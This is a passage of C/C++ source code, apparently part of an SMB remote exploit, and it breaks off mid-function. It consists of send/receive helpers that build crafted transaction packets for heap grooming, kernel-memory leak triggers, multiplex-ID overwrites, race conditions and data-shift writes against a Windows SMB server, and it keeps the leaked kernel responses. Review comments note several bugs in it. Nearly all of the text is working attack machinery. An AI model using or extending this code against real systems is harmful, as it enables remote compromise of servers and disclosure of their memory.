BOOLEAN SendRecvTransFirstMultiRequestTypeOne(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info IN* info)
{
    // static: shared across calls, not reentrant
    static unsigned int sendsize[2], recvsize[2], * sstatus, * rstatus;
    BUFFER* srv = &outbound->ThisPacket, * client = &inbound->ThisPacket, tmp = { 0 };
    // NOTE(review): the middle entry is byte-swapped while the others are
    // not -- presumably intentional, but confirm against the packet builder.
    WORD mids[] = { 75, byteswap16(64), 76 };
    if (badsock(s))
        return FALSE;

    if (isnull(outbound) || isnull(inbound) || isnull(info))
    {
        SetLastError(STATUS_INVALID_PARAMETER);
        return FALSE;
    }

    sstatus = sendsize;
    rstatus = recvsize;

    if (isnull(trans_multirequest_type_one_packet(srv, get_pid(info), get_uid(info), mids, get_tid(info))))
    {
        errmsg(__FUNCSIG__, __LINE__, STATUS_FAIL | GetLastError());
        return FALSE;
    }


    PutUnsigned(sstatus, SendData(srv, s, GetUnsigned(sendsize + 1)));

    if (!GetUlong(sstatus) || issockerr(GetUlong(sstatus)))
    {
        *sstatus = WSAGetLastError();
        SetLastError(GetUlong(sstatus));
        errmsg(__FUNCSIG__, __LINE__, GetLastError());
        bwsfree(srv);
        return FALSE;
    }

    PutUnsigned(rstatus, RecvData(client, 0x400, s, GetUnsigned(recvsize + 1)));

    if (!GetUlong(rstatus) || issockerr(GetUlong(rstatus)))
    {
        *sstatus = WSAGetLastError();
        SetLastError(GetUlong(sstatus));
        errmsg(__FUNCSIG__, __LINE__, GetLastError());
        return FALSE;
    }

    // shrink the reply buffer to exactly the bytes received (copy via tmp)
    bwsalloc(&tmp, GetUlong(rstatus));
    cpy(tmp.pbdata, client->pbdata, tmp.dwsize);
    bwsfree(client);

    bwsalloc(client, tmp.dwsize);
    cpy(client->pbdata, tmp.pbdata, client->dwsize);
    bwsfree(&tmp);

    inbound->ThisSmb = MAKEPSMB(client->pbdata + SMB_HEADER_OFFSET);
    outbound->ThisSmb = MAKEPSMB(srv->pbdata + SMB_HEADER_OFFSET);
    inbound->ThisNetbiosSize = client->pbdata + NETBIOS_SIZE_OFFSET;
    outbound->ThisNetbiosSize = srv->pbdata + NETBIOS_SIZE_OFFSET;

    // the received length is not compared against the header size before
    // this dereference; a short frame from the peer reads past the reply
    if (!cmp(inbound->ThisSmb->Protocol, "\xFFSMB", 4))
        return FALSE;

    return TRUE;
}
595 |
// Builds the packet produced by trans_multirequest_type_one_number_two_packet
// (NULL passed where the first variant passed a mid array) into
// outbound->ThisPacket, sends it, reads the reply (up to 0x200 bytes) into
// inbound->ThisPacket, refreshes the ThisSmb/ThisNetbiosSize pointers and
// checks the reply's Protocol field for "\xFFSMB".  Returns TRUE on success.
// Status arrays are locals here (unlike the static ones in the siblings), so
// this variant is reentrant.
//
// NOTE(review): none of the failure paths free srv or client, unlike
// SendRecvTransDcerpcBind; srv/client are also formed before the null check.
BOOLEAN SendRecvTransSecondMultiRequestTypeOne(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info IN* info)
{
    unsigned int sstatus[2] = { 0 }, rstatus[2] = { 0 };
    BUFFER* srv = &outbound->ThisPacket, * client = &inbound->ThisPacket, tmp = { 0 };

    if (isnull(outbound) || isnull(inbound) || isnull(info))
    {
        PutUlong(sstatus + 1, STATUS_INVALID_PARAMETER);
        SetLastError(GetUlong(sstatus + 1));
        errmsg(__FUNCSIG__, __LINE__, GetLastError());
        return FALSE;
    }

    if (badsock(s))
    {
        PutUlong(sstatus, SOCKET_ERROR);
        SetLastError(GetUlong(sstatus));
        errmsg(__FUNCSIG__, __LINE__, GetLastError());
        return FALSE;
    }

    if (isnull(trans_multirequest_type_one_number_two_packet(srv, get_pid(info), get_uid(info), NULL, get_tid(info))))
    {
        errmsg(__FUNCSIG__, __LINE__, STATUS_FAIL);
        return FALSE;
    }

    PutUnsigned(sstatus, SendData(srv, s, GetUnsigned(sstatus + 1)));

    if (isnull(*sstatus) || issockerr(*sstatus))
    {
        errmsg(__FUNCSIG__, __LINE__, WSAGetLastError());
        return FALSE;
    }

    PutUnsigned(rstatus, RecvData(client, 0x200, s, GetUnsigned(rstatus + 1)));

    if (isnull(*rstatus) || issockerr(*rstatus))
    {
        errmsg(__FUNCSIG__, __LINE__, WSAGetLastError());
        return FALSE;
    }

    // shrink the reply buffer to exactly the bytes received (copy via tmp)
    bwsalloc(&tmp, GetUlong(rstatus));
    cpy(tmp.pbdata, client->pbdata, tmp.dwsize);
    bwsfree(client);

    bwsalloc(client, tmp.dwsize);
    cpy(client->pbdata, tmp.pbdata, client->dwsize);
    bwsfree(&tmp);

    inbound->ThisSmb = MAKEPSMB(client->pbdata + SMB_HEADER_OFFSET);
    outbound->ThisSmb = MAKEPSMB(srv->pbdata + SMB_HEADER_OFFSET);
    inbound->ThisNetbiosSize = client->pbdata + NETBIOS_SIZE_OFFSET;
    outbound->ThisNetbiosSize = srv->pbdata + NETBIOS_SIZE_OFFSET;

    // received length is not checked against the header size before this read
    if (!cmp(inbound->ThisSmb->Protocol, "\xFFSMB", 4))
        return FALSE;

    return TRUE;
}
657 |
// Builds the packet produced by trans_multirequest_type_one_number_three_packet
// (called through the create_packet function pointer) into
// outbound->ThisPacket, sends it, reads the reply (up to 0x400 bytes) into
// inbound->ThisPacket, refreshes the ThisSmb/ThisNetbiosSize pointers and
// checks the reply's Protocol field for "\xFFSMB".  Returns TRUE on success.
//
// NOTE(review): create_packet is initialised from the address of a function
// in this translation unit, so the isnull(create_packet) test below can
// never fire.  No failure path frees srv or client, and srv/client are
// formed before the null check on outbound/inbound.
BOOLEAN SendRecvTransThirdMultiRequestTypeOne(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info IN* info)
{
    // static: shared across calls, not reentrant
    static unsigned int sendstatus[2], recvstatus[2];
    BUFFER* srv = &outbound->ThisPacket, * client = &inbound->ThisPacket, tmp = { 0 };
    packet_creation_handler_type_one create_packet = &trans_multirequest_type_one_number_three_packet;

    if (isnull(outbound) || isnull(inbound) || isnull(info))
        return FALSE;

    if (badsock(s))
        return FALSE;

    if (isnull(create_packet))
        return FALSE;

    if (isnull(create_packet(srv, get_pid(info), get_uid(info), get_mid(info), get_tid(info))))
        return FALSE;

    PutUnsigned(sendstatus, SendData(srv, s, GetUnsigned(sendstatus + 1)));

    if (issockerr(GetUlong(sendstatus)) || !GetUlong(sendstatus))
        return FALSE;

    PutUnsigned(recvstatus, RecvData(client, 0x400, s, GetUnsigned(recvstatus + 1)));

    if (issockerr(GetUlong(recvstatus)) || !GetUlong(recvstatus))
        return FALSE;

    // shrink the reply buffer to exactly the bytes received (copy via tmp)
    bwsalloc(&tmp, GetUlong(recvstatus));
    cpy(tmp.pbdata, client->pbdata, tmp.dwsize);
    bwsfree(client);

    bwsalloc(client, tmp.dwsize);
    cpy(client->pbdata, tmp.pbdata, client->dwsize);
    bwsfree(&tmp);

    inbound->ThisSmb = MAKEPSMB(client->pbdata + SMB_HEADER_OFFSET);
    outbound->ThisSmb = MAKEPSMB(srv->pbdata + SMB_HEADER_OFFSET);
    inbound->ThisNetbiosSize = client->pbdata + NETBIOS_SIZE_OFFSET;
    outbound->ThisNetbiosSize = srv->pbdata + NETBIOS_SIZE_OFFSET;

    // received length is not checked against the header size before this read
    if (!cmp(inbound->ThisSmb->Protocol, "\xFFSMB", 4))
        return FALSE;

    return TRUE;
}
704 |
// Builds the packet produced by trans_groom_type_two_packet into
// outbound->ThisPacket, sends it, reads the reply (up to 0x400 bytes) into
// inbound->ThisPacket and returns TRUE when the reply carries the "\xFFSMB"
// signature.  Every failure path records a code via SetLastError() and
// errmsg().  Status arrays are locals, so this variant is reentrant.
//
// NOTE(review): the ThisSmb / ThisNetbiosSize pointers are not refreshed
// after inbound->ThisPacket is reallocated, unlike most siblings; a
// previously set inbound->ThisSmb would dangle.  No failure path frees srv
// or client, and srv/client are formed before the null check.
BOOLEAN SendRecvTransGroomTypeTwo(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info IN* info)
{
    // [0] holds the byte count, [1] is the status out-parameter / error code
    unsigned sendsize[2] = { 0 }, recvsize[2] = { 0 }, * rstatus = recvsize, * sstatus = sendsize;
    BUFFER* srv = &outbound->ThisPacket, * client = &inbound->ThisPacket, tmp = { 0 };

    if (isnull(outbound) || isnull(inbound) || isnull(info))
    {
        PutUlong(sstatus + 1, STATUS_INVALID_PARAMETER);
        SetLastError(GetUlong(sstatus + 1));
        errmsg(__FUNCSIG__, __LINE__, GetLastError());
        return FALSE;
    }

    if (badsock(s))
    {
        PutUlong(sstatus, SOCKET_ERROR);
        SetLastError(GetUlong(sstatus));
        errmsg(__FUNCSIG__, __LINE__, GetLastError());
        return FALSE;
    }

    if (isnull(trans_groom_type_two_packet(srv, get_pid(info), get_uid(info), get_mid(info), get_tid(info))))
    {
        SetLastError(STATUS_FAIL);
        errmsg(__FUNCSIG__, __LINE__, GetLastError());
        return FALSE;
    }

    PutUlong(sstatus, SendData(srv, s, GetUnsigned(sendsize + 1)));

    if (isnull(GetUlong(sstatus)) || issockerr(GetUlong(sstatus)))
    {
        PutUnsigned(sendsize + 1, WSAGetLastError());
        SetLastError(GetUlong(sendsize + 1));
        errmsg(__FUNCSIG__, __LINE__, GetUlong(sendsize + 1));
        return FALSE;
    }

    PutUlong(rstatus, RecvData(client, 0x400, s, GetUnsigned(rstatus + 1)));

    if (isnull(GetUlong(rstatus)) || issockerr(GetUlong(rstatus)))
    {
        PutUnsigned(recvsize + 1, WSAGetLastError());
        SetLastError(GetUlong(recvsize + 1));
        errmsg(__FUNCSIG__, __LINE__, GetLastError());
        return FALSE;
    }

    // shrink the reply buffer to exactly the bytes received (copy via tmp)
    bwsalloc(&tmp, GetUlong(rstatus));
    cpy(tmp.pbdata, client->pbdata, tmp.dwsize);
    bwsfree(client);

    bwsalloc(client, tmp.dwsize);
    cpy(client->pbdata, tmp.pbdata, client->dwsize);
    bwsfree(&tmp);

    if (!cmp(client->pbdata + SMB_HEADER_OFFSET, "\xFFSMB", 4))
        return FALSE;
    else
        return TRUE;
}
766 |
// Builds the packet produced by trans_secondary_trigger_second_leak_packet
// (hard-coded pid 10252 and mid 75) into outbound->ThisPacket, sends it, reads
// the reply (up to 0x400 bytes) into inbound->ThisPacket, copies that reply
// into leak->KrnlLeakResponse and fills in leak's header/parameter/data
// pointers from the transaction response.  Returns TRUE when the copied reply
// carries the "\xFFSMB" signature.
//
// NOTE(review): BUG -- sstatus is a `static` pointer and is only assigned
// (`sstatus = sendsize;`) *after* the two argument checks below use it
// (`PutUlong(sstatus + 1, ...)`, `PutUlong(sstatus, ...)`).  On the first call
// it is NULL, so either failure path writes through a null pointer.  Move the
// two assignments above the checks.
// NOTE(review): transresp->ParameterOffset and ->DataOffset are read from the
// peer's reply and added to ResponseHeader without being compared against
// leakbws->dwsize, so ResponseParameters / ResponseData can point outside the
// received buffer.  Callers should bounds-check before dereferencing them.
// NOTE(review): srv/client/leakbws are formed before the null checks; hoist
// the checks.  The final cmp() repeats the check already done on client
// (the same bytes), so it is effectively always TRUE at that point.
BOOLEAN SendRecvTransSecondarySecondLeakTrigger(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, LeakedDataLinkedList* IN OUT leak, SOCKET& IN s, smb_info IN* info)
{
    // static: shared across calls, not reentrant
    static unsigned int sendsize[2], recvsize[2], * sstatus, * rstatus;
    BUFFER* srv = &outbound->ThisPacket, * client = &inbound->ThisPacket, * leakbws = &leak->KrnlLeakResponse, tmp = { 0 };
    static WORD pid, mid;
    PRESP_TRANSACTION transresp = NULL;

    PutUshort(&pid, 10252);
    PutUshort(&mid, 75);
    // mid = ((get_mid(info) == 75) ? get_mid(info) : get_special_mid(info));

    if (isnull(outbound) || isnull(inbound) || isnull(info) || isnull(leak))
    {
        // sstatus is still NULL here on the first call (see note above)
        PutUlong(sstatus + 1, STATUS_INVALID_PARAMETER);
        SetLastError(GetUlong(sstatus + 1));
        errmsg(__FUNCSIG__, __LINE__, GetLastError());
        return FALSE;
    }

    if (badsock(s))
    {
        // sstatus is still NULL here on the first call (see note above)
        PutUlong(sstatus, SOCKET_ERROR);
        SetLastError(GetUlong(sstatus));
        errmsg(__FUNCSIG__, __LINE__, GetLastError());
        return FALSE;
    }

    rstatus = recvsize;
    sstatus = sendsize;

    if (isnull(trans_secondary_trigger_second_leak_packet(srv, pid, get_uid(info), mid, get_tid(info))))
    {
        errmsg(__FUNCSIG__, __LINE__, GetLastError());
        return FALSE;
    }

    PutUnsigned(sstatus, SendData(srv, s, GetUnsigned(sendsize + 1)));

    if (!GetUlong(sstatus) || issockerr(GetUlong(sstatus)))
        return FALSE;

    PutUnsigned(rstatus, RecvData(client, 0x400, s, GetUnsigned(recvsize + 1)));

    if (!GetUlong(rstatus) || issockerr(GetUlong(rstatus)))
        return FALSE;

    if (!cmp(client->pbdata + SMB_HEADER_OFFSET, "\xFFSMB", 4))
        return FALSE;

    // shrink the reply buffer to exactly the bytes received (copy via tmp)
    bwsalloc(&tmp, GetUlong(rstatus));
    cpy(tmp.pbdata, client->pbdata, tmp.dwsize);
    bwsfree(client);

    bwsalloc(client, tmp.dwsize);
    cpy(client->pbdata, tmp.pbdata, client->dwsize);
    bwsfree(&tmp);

    // keep a separate copy of the reply in the leak list
    bwsalloc(leakbws, client->dwsize);
    cpy(leakbws->pbdata, client->pbdata, leakbws->dwsize);

    inbound->ThisSmb = MAKEPSMB(inbound->ThisPacket.pbdata + SMB_HEADER_OFFSET);
    outbound->ThisSmb = MAKEPSMB(outbound->ThisPacket.pbdata + SMB_HEADER_OFFSET);
    leak->ResponseHeader = MAKEPSMB(leak->KrnlLeakResponse.pbdata + SMB_HEADER_OFFSET);

    inbound->ThisNetbiosSize = inbound->ThisPacket.pbdata + NETBIOS_SIZE_OFFSET;
    outbound->ThisNetbiosSize = outbound->ThisPacket.pbdata + NETBIOS_SIZE_OFFSET;
    leak->ResponseNetbios = MAKEPDWORD(leak->KrnlLeakResponse.pbdata);

    transresp = (PRESP_TRANSACTION)(leakbws->pbdata + SMB_PARAM_OFFSET);

    // offsets below are peer-supplied and unchecked (see note above)
    leak->ResponseParameters = (MAKEPBYTE(leak->ResponseHeader) + transresp->ParameterOffset);
    leak->ResponseData = (MAKEPBYTE(leak->ResponseHeader) + transresp->DataOffset);

    return((cmp(leak->KrnlLeakResponse.pbdata + SMB_HEADER_OFFSET, "\xFFSMB", 4) == TRUE) ? TRUE : FALSE);
}
842 |
// Forces the fid in info to 0x4000, builds the packet produced by
// write_andx_shift_indata_packet (hard-coded pid 10251, get_special_mid) into
// outbound->ThisPacket, sends it, reads the reply (up to 0x400 bytes) into
// inbound->ThisPacket and refreshes the ThisSmb/ThisNetbiosSize pointers.
// Returns TRUE only when the reply has the "\xFFSMB" signature and a zero
// NtStatus; a non-zero NtStatus is stored in info->srv_last_error and passed
// to SetLastError() before returning FALSE.
//
// NOTE(review): srv/client are formed before the null check on
// outbound/inbound; hoist the check.  No failure path frees srv or client.
BOOLEAN SendRecvWriteAndxIndataShift(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info* IN info)
{
    unsigned int sendsize[2] = { 0 }, recvsize[2] = { 0 };
    BUFFER* srv = &outbound->ThisPacket, * client = &inbound->ThisPacket, tmp = { 0 };

    if (isnull(outbound) || isnull(inbound) || isnull(info))
        return FALSE;

    if (badsock(s))
        return FALSE;

    // overrides whatever fid SendRecvNtCreateAndx stored
    if (get_fid(info) != 0x4000)
        set_fid(info, 0x4000);

    if (isnull(write_andx_shift_indata_packet(srv, 10251, get_uid(info), get_special_mid(info), get_tid(info), get_fid(info))))
        return FALSE;

    PutUnsigned(sendsize, SendData(srv, s, GetUnsigned(sendsize + 1)));

    if (!GetUlong(sendsize) || issockerr(GetUlong(sendsize)))
        return FALSE;

    PutUnsigned(recvsize, RecvData(client, 0x400, s, GetUnsigned(recvsize + 1)));

    if (!GetUlong(recvsize) || issockerr(GetUlong(recvsize)))
        return FALSE;

    // shrink the reply buffer to exactly the bytes received (copy via tmp)
    bwsalloc(&tmp, GetUlong(recvsize));
    cpy(tmp.pbdata, client->pbdata, tmp.dwsize);
    bwsfree(client);

    bwsalloc(client, tmp.dwsize);
    cpy(client->pbdata, tmp.pbdata, client->dwsize);
    bwsfree(&tmp);

    inbound->ThisSmb = MAKEPSMB(inbound->ThisPacket.pbdata + SMB_HEADER_OFFSET);
    outbound->ThisSmb = MAKEPSMB(outbound->ThisPacket.pbdata + SMB_HEADER_OFFSET);

    inbound->ThisNetbiosSize = (inbound->ThisPacket.pbdata + NETBIOS_SIZE_OFFSET);
    outbound->ThisNetbiosSize = (outbound->ThisPacket.pbdata + NETBIOS_SIZE_OFFSET);

    // received length is not checked against the header size before this read
    if (!cmp(inbound->ThisSmb->Protocol, "\xFFSMB", 4))
    {
        SetLastError(NT_STATUS_INVALID_SMB);
        errmsg(__FUNCSIG__, __LINE__, GetLastError());
        return FALSE;
    }

    // `& 0xFFFFFFFFUL` is a no-op on a 32-bit value; this is simply "NtStatus != 0"
    if (GetUlong(&inbound->ThisSmb->Status.NtStatus) & 0xFFFFFFFFUL)
    {
        SetLastError(GetUlong(&inbound->ThisSmb->Status.NtStatus));
        PutUlong(&info->srv_last_error, GetUlong(&inbound->ThisSmb->Status.NtStatus));
        return FALSE;
    }

    return TRUE;
}
900 |
// Builds the packet produced by trans_secondary_mid_overwrite_packet
// (hard-coded pid 10251, get_special_mid) into outbound->ThisPacket, sends it,
// reads the reply (up to 0x100 bytes) into inbound->ThisPacket and refreshes
// the ThisSmb/ThisNetbiosSize pointers.  Returns TRUE only when the reply has
// the "\xFFSMB" signature and a zero NtStatus; a non-zero NtStatus is stored
// in info->srv_last_error, passed to SetLastError() and logged via errmsg().
//
// NOTE(review): srv/client are formed before the null check on
// outbound/inbound; hoist the check.  No failure path frees srv or client.
BOOLEAN SendRecvTransSecondaryMultiplexOverwrite(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info* IN info)
{
    unsigned int sendstatus[2] = { 0 }, recvstatus[2] = { 0 };
    BUFFER* srv = &outbound->ThisPacket, * client = &inbound->ThisPacket, tmp = { 0 };

    if (isnull(outbound) || isnull(inbound) || isnull(info))
        return FALSE;

    if (badsock(s))
        return FALSE;

    if (isnull(trans_secondary_mid_overwrite_packet(srv, 10251, get_uid(info), get_special_mid(info), get_tid(info))))
        return FALSE;

    PutUnsigned(sendstatus, SendData(srv, s, GetUnsigned(sendstatus + 1)));

    if (!GetUlong(sendstatus) || issockerr(GetUlong(sendstatus)))
        return FALSE;

    PutUnsigned(recvstatus, RecvData(client, 0x100, s, GetUnsigned(recvstatus + 1)));

    if (!GetUlong(recvstatus) || issockerr(GetUlong(recvstatus)))
        return FALSE;

    // shrink the reply buffer to exactly the bytes received (copy via tmp)
    bwsalloc(&tmp, GetUlong(recvstatus));
    cpy(tmp.pbdata, client->pbdata, tmp.dwsize);
    bwsfree(client);

    bwsalloc(client, tmp.dwsize);
    cpy(client->pbdata, tmp.pbdata, client->dwsize);
    bwsfree(&tmp);

    inbound->ThisSmb = MAKEPSMB(inbound->ThisPacket.pbdata + SMB_HEADER_OFFSET);
    outbound->ThisSmb = MAKEPSMB(outbound->ThisPacket.pbdata + SMB_HEADER_OFFSET);

    inbound->ThisNetbiosSize = (inbound->ThisPacket.pbdata + NETBIOS_SIZE_OFFSET);
    outbound->ThisNetbiosSize = (outbound->ThisPacket.pbdata + NETBIOS_SIZE_OFFSET);

    // received length is not checked against the header size before this read
    if (!cmp(inbound->ThisSmb->Protocol, "\xFFSMB", 4))
        return FALSE;

    // `& 0xFFFFFFFF` is a no-op on a 32-bit value; this is simply "NtStatus != 0"
    if (inbound->ThisSmb->Status.NtStatus & 0xFFFFFFFF)
    {
        PutUlong(&info->srv_last_error, GetUlong(&inbound->ThisSmb->Status.NtStatus));
        SetLastError(info->srv_last_error);
        errmsg(__FUNCSIG__, __LINE__, GetLastError());
        return FALSE;
    }

    return TRUE;
}
952 |
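BOOLEAN SendRecvTransSecondaryFirstMuliplexZero(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info* IN info)
{
	/*
	 * Builds the request produced by trans_secondary_first_mid_zero_packet()
	 * (pid 10252, mid 0, uid/tid from info) into outbound->ThisPacket, sends it
	 * on s, receives up to 0x100 bytes into inbound->ThisPacket and re-homes the
	 * received bytes into a buffer sized to exactly the byte count read.  The
	 * SMB header and NetBIOS-length pointers of both lists are refreshed.
	 *
	 * Returns FALSE when an argument is NULL, the socket is unusable, packet
	 * creation fails, send/recv report 0 or a socket error, or the response
	 * lacks the 0xFF 'S' 'M' 'B' signature (last error = NT_STATUS_INVALID_SMB).
	 * Returns TRUE otherwise.
	 *
	 * NOTE(review): unlike the neighbouring helpers this one does not inspect
	 * Status.NtStatus of the response; presumably deliberate - confirm.
	 */
	unsigned int sendstatus[2] = { 0 }, recvstatus[2] = { 0 };
	BUFFER tmp = { 0 };

	if (isnull(outbound) || isnull(inbound) || isnull(info))
		return FALSE;

	if (badsock(s))
		return FALSE;

	BUFFER* srv = &outbound->ThisPacket;
	BUFFER* client = &inbound->ThisPacket;

	if (isnull(trans_secondary_first_mid_zero_packet(srv, 10252, get_uid(info), 0, get_tid(info))))
		return FALSE;

	PutUnsigned(sendstatus, SendData(srv, s, GetUnsigned(sendstatus + 1)));

	if (!GetUlong(sendstatus) || issockerr(GetUlong(sendstatus)))
		return FALSE;

	// The trailing argument is taken from the second status slot, as every
	// sibling helper does (the previous revision passed slot 0 here).
	PutUnsigned(recvstatus, RecvData(client, 0x100, s, GetUnsigned(recvstatus + 1)));

	if (!GetUlong(recvstatus) || issockerr(GetUlong(recvstatus)))
		return FALSE;

	// Re-home the response into a buffer sized to the bytes actually read.
	bwsalloc(&tmp, GetUlong(recvstatus));
	cpy(tmp.pbdata, client->pbdata, tmp.dwsize);
	bwsfree(client);

	bwsalloc(client, tmp.dwsize);
	cpy(client->pbdata, tmp.pbdata, client->dwsize);
	bwsfree(&tmp);

	// Buffers may have moved; refresh the header/NetBIOS pointers.
	inbound->ThisSmb = MAKEPSMB(inbound->ThisPacket.pbdata + SMB_HEADER_OFFSET);
	outbound->ThisSmb = MAKEPSMB(outbound->ThisPacket.pbdata + SMB_HEADER_OFFSET);

	inbound->ThisNetbiosSize = (inbound->ThisPacket.pbdata + NETBIOS_SIZE_OFFSET);
	outbound->ThisNetbiosSize = (outbound->ThisPacket.pbdata + NETBIOS_SIZE_OFFSET);

	if (!cmp(inbound->ThisSmb->Protocol, "\xFFSMB", 4))
	{
		SetLastError(NT_STATUS_INVALID_SMB);
		return FALSE;
	}
	return TRUE;
}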
998 |
BOOLEAN SendRecvTransSecondaryFirstSpecialMultiplex(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info* IN info)
{
	/*
	 * Send-only helper: builds the request produced by
	 * trans_secondary_first_special_mid_packet() (pid 10251, the "special" mid
	 * and uid/tid from info) into outbound->ThisPacket and sends it on s.
	 * No response is read; inbound's header/NetBIOS pointers are merely
	 * re-derived from whatever inbound->ThisPacket currently holds.
	 *
	 * Returns FALSE when an argument is NULL, the socket is unusable, packet
	 * creation fails, or SendData reports 0 or a socket error; TRUE otherwise.
	 */
	unsigned int sent[2] = { 0 };

	if (isnull(outbound) || isnull(inbound) || isnull(info) || badsock(s))
		return FALSE;

	BUFFER* request = &outbound->ThisPacket;

	if (isnull(trans_secondary_first_special_mid_packet(request, 10251, get_uid(info), get_special_mid(info), get_tid(info))))
		return FALSE;

	PutUnsigned(sent, SendData(request, s, GetUnsigned(sent + 1)));
	if (GetUlong(sent) == 0 || issockerr(GetUlong(sent)))
		return FALSE;

	inbound->ThisNetbiosSize = inbound->ThisPacket.pbdata + NETBIOS_SIZE_OFFSET;
	inbound->ThisSmb = MAKEPSMB(inbound->ThisPacket.pbdata + SMB_HEADER_OFFSET);

	return TRUE;
}
1029 |
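BOOLEAN SendRecvTransSecondaryRaceTypeOne(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, LeakedDataLinkedList* IN OUT leak, SOCKET& IN s, smb_info* IN info)
{
	/*
	 * Builds the request produced by trans_secondary_race_type_one_packet()
	 * (the "special" pid from info, mid 0, uid/tid from info) into
	 * outbound->ThisPacket, sends it on s, receives up to 0x100 bytes into
	 * inbound->ThisPacket and keeps a second, identical copy of the response
	 * in leak->KrnlLeakResponse.  The leak record is then carved up:
	 * ResponseHeader/ResponseNetbios point into the leak copy, while
	 * ResponseParameters/ResponseData are located through the
	 * ParameterOffset/DataOffset words of the transaction response.
	 *
	 * Returns FALSE when an argument is NULL, the socket is unusable, packet
	 * creation fails, send/recv report 0 or a socket error, the response is
	 * too short to contain an SMB header, or either copy lacks the
	 * 0xFF 'S' 'M' 'B' signature (last error = NT_STATUS_INVALID_SMB).
	 * Returns TRUE otherwise.
	 */
	unsigned int sendstatus[2] = { 0 }, recvstatus[2] = { 0 };
	BUFFER tmp = { 0 };
	PRESP_TRANSACTION responsetransaction = NULL;

	// `leak` is dereferenced below, so it is guarded like the other arguments
	// (the sibling race helpers already do this).
	if (isnull(outbound) || isnull(inbound) || isnull(leak) || isnull(info))
		return FALSE;

	if (badsock(s))
		return FALSE;

	BUFFER* srv = &outbound->ThisPacket;
	BUFFER* client = &inbound->ThisPacket;
	BUFFER* leakbws = &leak->KrnlLeakResponse;

	if (isnull(trans_secondary_race_type_one_packet(srv, get_special_pid(info), get_uid(info), 0, get_tid(info))))
		return FALSE;

	PutUnsigned(sendstatus, SendData(srv, s, GetUnsigned(sendstatus + 1)));

	if (!GetUlong(sendstatus) || issockerr(GetUlong(sendstatus)))
		return FALSE;

	PutUnsigned(recvstatus, RecvData(client, 0x100, s, GetUnsigned(recvstatus + 1)));

	if (!GetUlong(recvstatus) || issockerr(GetUlong(recvstatus)))
		return FALSE;

	// The header is read at a fixed offset below; refuse a response that
	// cannot hold one rather than reading past the received bytes.
	if (GetUlong(recvstatus) < SMB_HEADER_OFFSET + sizeof(SMB_HEADER))
	{
		SetLastError(NT_STATUS_INVALID_SMB);
		return FALSE;
	}

	// Re-home the response into a buffer sized to the bytes actually read and
	// take the leak copy from the same scratch buffer.
	bwsalloc(&tmp, GetUlong(recvstatus));
	cpy(tmp.pbdata, client->pbdata, tmp.dwsize);
	bwsfree(client);

	bwsalloc(leakbws, tmp.dwsize);
	cpy(leakbws->pbdata, tmp.pbdata, leakbws->dwsize);

	bwsalloc(client, tmp.dwsize);
	cpy(client->pbdata, tmp.pbdata, client->dwsize);
	bwsfree(&tmp);

	inbound->ThisNetbiosSize = inbound->ThisPacket.pbdata + NETBIOS_SIZE_OFFSET;
	inbound->ThisSmb = MAKEPSMB(inbound->ThisPacket.pbdata + SMB_HEADER_OFFSET);

	outbound->ThisNetbiosSize = outbound->ThisPacket.pbdata + NETBIOS_SIZE_OFFSET;
	outbound->ThisSmb = MAKEPSMB(outbound->ThisPacket.pbdata + SMB_HEADER_OFFSET);

	responsetransaction = (PRESP_TRANSACTION)(leakbws->pbdata + SMB_PARAM_OFFSET);

	leak->ResponseHeader = MAKEPSMB(leakbws->pbdata + SMB_HEADER_OFFSET);
	leak->ResponseNetbios = MAKEPDWORD(leakbws->pbdata);
	// NOTE(review): ParameterOffset/DataOffset are server-supplied and are not
	// checked against leakbws->dwsize here; consumers of ResponseParameters /
	// ResponseData must bound their own reads.
	leak->ResponseParameters = MAKEPBYTE(leak->ResponseHeader) + responsetransaction->ParameterOffset;
	leak->ResponseData = MAKEPBYTE(leak->ResponseHeader) + responsetransaction->DataOffset;

	if (!cmp(leak->ResponseHeader->Protocol, "\xFFSMB", 4) || !cmp(inbound->ThisSmb->Protocol, "\xFFSMB", 4))
	{
		SetLastError(NT_STATUS_INVALID_SMB);
		return FALSE;
	}

	return TRUE;
}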
1089 |
BOOLEAN SendRecvTransSecondarySecondMultiplexZero(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, SOCKET& IN s, smb_info* IN info)
{
	/*
	 * Send-only helper: builds the request produced by
	 * trans_secondary_second_mid_zero_packet() (pid 10252, mid 0, uid/tid from
	 * info) into outbound->ThisPacket and sends it on s.  Nothing is received
	 * and inbound is left untouched; only outbound's header/NetBIOS pointers
	 * are refreshed.
	 *
	 * Returns FALSE when an argument is NULL, the socket is unusable, packet
	 * creation fails, or SendData reports 0 or a socket error; TRUE otherwise.
	 */
	unsigned int sent[2] = { 0 };

	if (isnull(outbound) || isnull(inbound) || isnull(info) || badsock(s))
		return FALSE;

	BUFFER* request = &outbound->ThisPacket;

	if (isnull(trans_secondary_second_mid_zero_packet(request, 10252, get_uid(info), 0, get_tid(info))))
		return FALSE;

	PutUnsigned(sent, SendData(request, s, GetUnsigned(sent + 1)));
	if (GetUlong(sent) == 0 || issockerr(GetUlong(sent)))
		return FALSE;

	outbound->ThisSmb = MAKEPSMB(request->pbdata + SMB_HEADER_OFFSET);
	outbound->ThisNetbiosSize = request->pbdata + NETBIOS_SIZE_OFFSET;

	return TRUE;
}
1117 |
BOOLEAN SendRecvTransSecondaryRaceTypeTwo(RequestPacketLinkedList* IN OUT outbound, ResponsePacketLinkedList* IN OUT inbound, LeakedDataLinkedList* IN OUT leak, SOCKET& IN s, smb_info* IN info)
{
	/*
